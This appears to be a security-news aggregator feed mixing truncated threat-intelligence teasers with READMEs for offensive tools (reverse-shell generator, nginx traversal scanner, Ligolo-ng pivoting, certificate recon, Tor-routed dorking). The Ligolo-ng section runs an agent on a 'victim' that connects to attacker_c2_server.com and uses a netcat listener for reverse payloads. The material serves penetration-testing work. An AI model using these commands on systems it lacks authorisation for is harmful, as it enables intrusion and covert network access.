Chinese users looking for legitimate software such as Notepad++ and VNote on search engines like Baidu are being targeted with malicious ads and bogus links to distribute trojanized versions of the software and ultimately deploy Geacon, a Golang-based implementation of Cobalt Strike. "The malicious site found in the notepad++ search is distributed through an advertisement block," Kaspersky

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentesters, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with 🖤 by the GroundSec team and released under the MIT LICENSE.



Kimsuky's New Golang Stealer 'Troll' and 'GoBear' Backdoor Target South Korea

The North Korea-linked nation-state actor known as Kimsuky is suspected of using a previously undocumented Golang-based information stealer called Troll Stealer. The malware steals "SSH, FileZilla, C drive files/directories, browsers, system information, [and] screen captures" from infected systems, South Korean cybersecurity company S2W said in a new technical report. Troll

Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R


navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Techniques

Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):

Heuristics

navgix makes an initial GET request to the page, and if any directories are referenced in the page HTML (in src attributes of HTML elements), it tests each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
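A minimal Go sketch of that path decomposition (the helper name is hypothetical, not navgix's actual code):

package main

import (
	"fmt"
	"strings"
)

// parentDirs returns every parent directory of a discovered asset path,
// e.g. /static/img/photos/avatar.png -> /static/, /static/img/, /static/img/photos/.
func parentDirs(assetPath string) []string {
	parts := strings.Split(strings.Trim(assetPath, "/"), "/")
	var dirs []string
	prefix := "/"
	for _, p := range parts[:len(parts)-1] { // drop the file name itself
		prefix += p + "/"
		dirs = append(dirs, prefix)
	}
	return dirs
}

func main() {
	fmt.Println(parentDirs("/static/img/photos/avatar.png"))
	// Output: [/static/ /static/img/ /static/img/photos/]
}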

Brute-force

navgix also tests a short list of directories that commonly have this vulnerability, and if any of them exist, it attempts to confirm whether the vulnerability is present.

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network

The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has made a return with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network. "The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security

Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

As an example, for a TCP connection:

  • A SYN is translated to a connect() on the remote side
  • A SYN-ACK is sent back if the connect() succeeds
  • A RST is sent if an ECONNRESET, ECONNABORTED or ECONNREFUSED error is returned by connect()
  • Nothing is sent on timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).
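A rough Go sketch of that SYN-to-connect() translation logic (greatly simplified; Ligolo-ng actually does this inside a Gvisor userland network stack rather than with net.Dial):

package main

import (
	"fmt"
	"net"
	"time"
)

// handleSYN illustrates the idea: when the tun interface sees a SYN for dst,
// the agent attempts a real connect() on the remote network and the proxy
// answers with a SYN-ACK or a RST depending on the outcome.
func handleSYN(dst string) string {
	conn, err := net.DialTimeout("tcp", dst, 3*time.Second)
	if err != nil {
		if ne, ok := err.(net.Error); ok && ne.Timeout() {
			return "no reply (timeout)"
		}
		return "RST (connection refused/reset/aborted)"
	}
	conn.Close()
	return "SYN-ACK (connect succeeded)"
}

func main() {
	// Address taken from the example agent network later in this README.
	fmt.Println(handleSYN("192.168.0.30:80"))
}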

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
┌───────────────────────────────────────┐
│ Interface 3                           │
├──────────────┬────────────────────────┤
│ Name         │ wlp3s0                 │
│ Hardware MAC │ de:ad:be:ef:ca:fe      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24        │
└──────────────┴────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx Mét MTU État Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.
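Conceptually, the listener behaves like a small TCP forwarder running on the agent: it accepts connections on the agent address and relays the stream to the proxy redirect address. A standalone Go sketch of the same idea (not Ligolo-ng's actual implementation, which multiplexes this traffic over the agent session):

package main

import (
	"io"
	"log"
	"net"
)

func main() {
	// Equivalent of: listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
	ln, err := net.Listen("tcp", "0.0.0.0:1234")
	if err != nil {
		log.Fatal(err)
	}
	for {
		client, err := ln.Accept()
		if err != nil {
			continue
		}
		go func(c net.Conn) {
			defer c.Close()
			// Relay the accepted connection to the proxy redirect address.
			upstream, err := net.Dial("tcp", "127.0.0.1:4321")
			if err != nil {
				return
			}
			defer upstream.Close()
			go io.Copy(upstream, c)
			io.Copy(c, upstream)
		}(client)
	}
}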

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                              │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


CloudRecon - Finding assets from certificates

By: Zion3R


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

**You must have CGO enabled, and you may have to install gcc to run CloudRecon**

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite consists of three parts, written in Go:

Scrape - A LIVE running tool to inspect the ranges for a keyword in SSL certs' CN and SN fields in real time.

Store - a tool to retrieve IPs' certs and download all their Orgs, CNs, and SANs, so you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.
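As an illustration of the core technique (grabbing the certificate presented by an IP and reading its Org, CN and SANs), here is a small Go sketch; it is not CloudRecon's actual code, and the target address is just an example:

package main

import (
	"crypto/tls"
	"fmt"
	"net"
	"time"
)

// grabCert connects to addr (e.g. "203.0.113.10:443"), skips verification
// because we only care about the certificate presented, and prints the
// Org, CN and SANs, which is the data CloudRecon hunts through.
func grabCert(addr string) error {
	dialer := &net.Dialer{Timeout: 4 * time.Second}
	conn, err := tls.DialWithDialer(dialer, "tcp", addr, &tls.Config{InsecureSkipVerify: true})
	if err != nil {
		return err
	}
	defer conn.Close()

	cert := conn.ConnectionState().PeerCertificates[0]
	fmt.Println("Org: ", cert.Subject.Organization)
	fmt.Println("CN:  ", cert.Subject.CommonName)
	fmt.Println("SANs:", cert.DNSNames)
	return nil
}

func main() {
	if err := grabCert("203.0.113.10:443"); err != nil {
		fmt.Println("error:", err)
	}
}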

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


EasyEASM - Zero-dollar Attack Surface Management Tool

By: Zion3R


Zero-dollar attack surface management tool

featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.

Description

Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.


Installation

go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is example of this yaml file:

# EasyEASM configurations
runConfig:
  domains: # List root domains here.
    - example.com
    - mydomain.com
  slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
  discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
  runType: fast # Set to either fast (passive enum) or complete (active enumeration).
  activeWordList: subdomainWordlist.txt
  activeThreads: 100

Usage

To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:

./easyeasm

After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!

Warranty

The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.

License

This project is licensed under the MIT License - see the LICENSE.md for details.

Contact

For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.



Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa

The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt

SideCopy Exploiting WinRAR Flaw in Attacks Targeting Indian Government Entities

The Pakistan-linked threat actor known as SideCopy has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and DRat. Enterprise security firm SEQRITE described the campaign as multi-platform, with the attacks also designed to infiltrate Linux systems with a

DorXNG - Next Generation DorX. Built By Dorks, For Dorks

By: Zion3R


DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.

Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.

The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.
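As a rough sketch of that flow (written in Go rather than Python, and assuming the SearXNG instance exposes its JSON output format; the server address matches the default Docker IP mentioned below, everything else is hypothetical):

package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/url"
	"sync"
)

// searxResult captures only the fields we care about from a SearXNG JSON response.
type searxResult struct {
	Results []struct {
		URL   string `json:"url"`
		Title string `json:"title"`
	} `json:"results"`
}

// query issues one search against a SearXNG instance and streams results out.
func query(server, q string, out chan<- string, wg *sync.WaitGroup) {
	defer wg.Done()
	resp, err := http.Get(server + "?q=" + url.QueryEscape(q) + "&format=json")
	if err != nil {
		return
	}
	defer resp.Body.Close()

	var r searxResult
	if json.NewDecoder(resp.Body).Decode(&r) == nil {
		for _, res := range r.Results {
			out <- res.Title + " | " + res.URL
		}
	}
}

func main() {
	server := "http://172.17.0.2/search" // hypothetical instance address
	queries := []string{"site:example.com intext:password", "inurl:admin"}

	out := make(chan string, 64)
	var wg sync.WaitGroup
	for _, q := range queries {
		wg.Add(1)
		go query(server, q, out, &wg) // concurrent queries, as DorXNG does
	}
	go func() { wg.Wait(); close(out) }()

	for line := range out {
		fmt.Println(line)
	}
}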


We have enabled every supported upstream search engine that allows advanced search operator queries:

  • Google
  • DuckDuckGo
  • Qwant
  • Bing
  • Brave
  • Startpage
  • Yahoo

For more information about what search engines SearXNG supports See: Configured Engines

Setup

LINUX ONLY ** Sorry Normies **

Install DorXNG

git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h

Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst

When starting multiple containers wait at least a few seconds between starting each one.

docker run researchanddestroy/searxng:latest

If you would like to build the container yourself:

git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>

By default DorXNG has a hard coded server variable in parse_args.py which is set to the IP address that Docker will assign to the first container you run on your machine 172.17.0.2. This can be changed, or overwritten with --server or --serverlist.

Start Issuing Search Queries

./DorXNG.py -q 'search query'

Query the DorXNG Database

./DorXNG.py -D 'regex search string'

Instructions

-h, --help            show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: --limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k
when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Verbose Output - Displays Raw JSON Output

Tips

Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries.

Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly. 

Most often, the more passes you make over a search query the more results you'll find. 

Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all.

Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries this generates a lot of upstream requests... So have patience.

Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename; the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations separate, it's there for you.

Four concurrent search requests seem to be the sweet spot. You can issue more, but the more queries you issue at a time, the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.

If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:

If you see anything other than that, or if you start to see HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one.

HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor circuit is probably too slow. Just keep going!

There really isn't a reason to run a ton of these containers... Yet... How many you run really depends on what you're doing. Each container uses approximately 1.25 GB of RAM.

Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.

Running multiple containers is nice because each has its own Tor circuit that's refreshing every 10 seconds.

When running in --serverlist mode, disable the --timeout feature so there is no delay between requests (the default delay interval is 4 seconds).

Keep in mind that the more containers you run, the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit... πŸ”πŸ˜‰

The more recursions your command goes through without returning to main the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good. 

If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...

Those Python Stack Frames are Thicc... πŸπŸ˜…

We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.

The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.

Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.

DO NOT merge data into a database that is currently being used by a running DorXNG process. This may cause errors and could potentially corrupt the database.

The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py

We've already run through it for you... πŸ˜‰ Our ghdb.db file contains over one million entries and counting! You can download it here: ghdb.db, if you'd like a copy. πŸ˜‰

Example of querying the ghdb.db database:

./DorXNG.py -d ghdb.db -D '^http.*\.sql$'

A rewrite of DorXNG in Golang is already in the works. πŸ˜‰ (GorXNG? | DorXNGNG?) πŸ˜†

We're gonna need more dorks... πŸ˜… Check out DorkGPT πŸ‘€

Examples πŸ’‘

Single Search Query

./DorXNG.py -q 'search query'

Concurrent Search Queries

./DorXNG.py -q 'search query' -c4

Page Iteration Mode

./DorXNG.py -q 'search query' -n4

Iterative Concurrent Search Queries

./DorXNG.py -q 'search query' -c4 -n64

Server List Iteration Mode

./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0

Query List Iteration Mode

./DorXNG.py -Q query.lst -c4 -n64

Query and Server List Iteration

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0

Main Function Loop Iteration Mode

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4

Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10

Merging a Database (One at a Time) into a New Database File

./DorXNG.py -d new-database.db -m dorxng.db

Merge All Database Files in the Current Working Directory into a New Database File

for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done

Query a Database

./DorXNG.py -d new-database.db -D 'regex search string'


DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors

The threat actors behind theΒ DDoSiaΒ attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down. The updated variant, written in Golang, "implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the

EndExt - Go Tool For Extracting All The Possible Endpoints From The JS Files

By: Zion3R


EndExt is a Go tool for extracting all the possible endpoints from JS files

Idea

When you crawl JS files from waybackurls, for example, or collect JS file URLs from your target website's home page source, and the website uses an API, you may want to look for all the endpoints in those JS files, because something hidden may be found here or there. That's why this tool was made: give it the JS file URLs and it grabs all the possible endpoints, URLs, and paths in the submitted JS files for you.
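
Below is a rough, hedged sketch of the general idea (not EndExt's actual matching logic): fetch a single JS file and pull out quoted strings that look like URLs or endpoint paths. The regular expression and program structure are illustrative assumptions only.

// endpoints_sketch.go - illustrative only, not EndExt's code.
// Fetches one JS file and prints quoted strings that look like endpoints/URLs.
package main

import (
    "fmt"
    "io"
    "net/http"
    "os"
    "regexp"
)

// Matches quoted values such as "https://...", "/api/v1/users" or "endpoints/sign-out".
// This pattern is a simplified assumption, not the tool's real regex.
var endpointRe = regexp.MustCompile(`["'](https?://[^"']+|/?[A-Za-z0-9_.-]+(?:/[A-Za-z0-9_.-]+)+)["']`)

func main() {
    jsURL := os.Args[1] // URL of a single JS file
    resp, err := http.Get(jsURL)
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()

    body, err := io.ReadAll(resp.Body)
    if err != nil {
        panic(err)
    }

    seen := map[string]bool{}
    for _, m := range endpointRe.FindAllStringSubmatch(string(body), -1) {
        if !seen[m[1]] {
            seen[m[1]] = true
            fmt.Println(m[1]) // print each unique candidate endpoint once
        }
    }
}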


Installation

You just need to install Go, then run:

β–Ά brew install go
β–Ά git clone https://github.com/SirBugs/endext.git

or download from https://go.dev/dl/

Usage:

β–Ά go run main.go urls.txt


/$$$$$$$$ /$$ /$$$$$$$$ /$$
| $$_____/ | $$| $$_____/ | $$
| $$ /$$$$$$$ /$$$$$$$| $$ /$$ /$$ /$$$$$$
| $$$$$ | $$__ $$ /$$__ $$| $$$$$ | $$ /$$/|_ $$_/
| $$__/ | $$ \ $$| $$ | $$| $$__/ \ $$$$/ | $$
| $$ | $$ | $$| $$ | $$| $$ >$$ $$ | $$ /$$
| $$$$$$$$| $$ | $$| $$$$$$$| $$$$$$$$ /$$/\ $$ | $$$$/
|________/|__/ |__/ \_______/|________/|__/ \__/ \___/

EndPointExt Tool By @SirBugs .go Version
V: 1.0.2 Made With All Love
For Extracting all possilbe endpoints from Js files
Twitter@SirBagoza -- GitHub@SirBugs
Run : go run main.go jsurls.txt

endpoints/users/password
sign-in
endpoints/sign-out
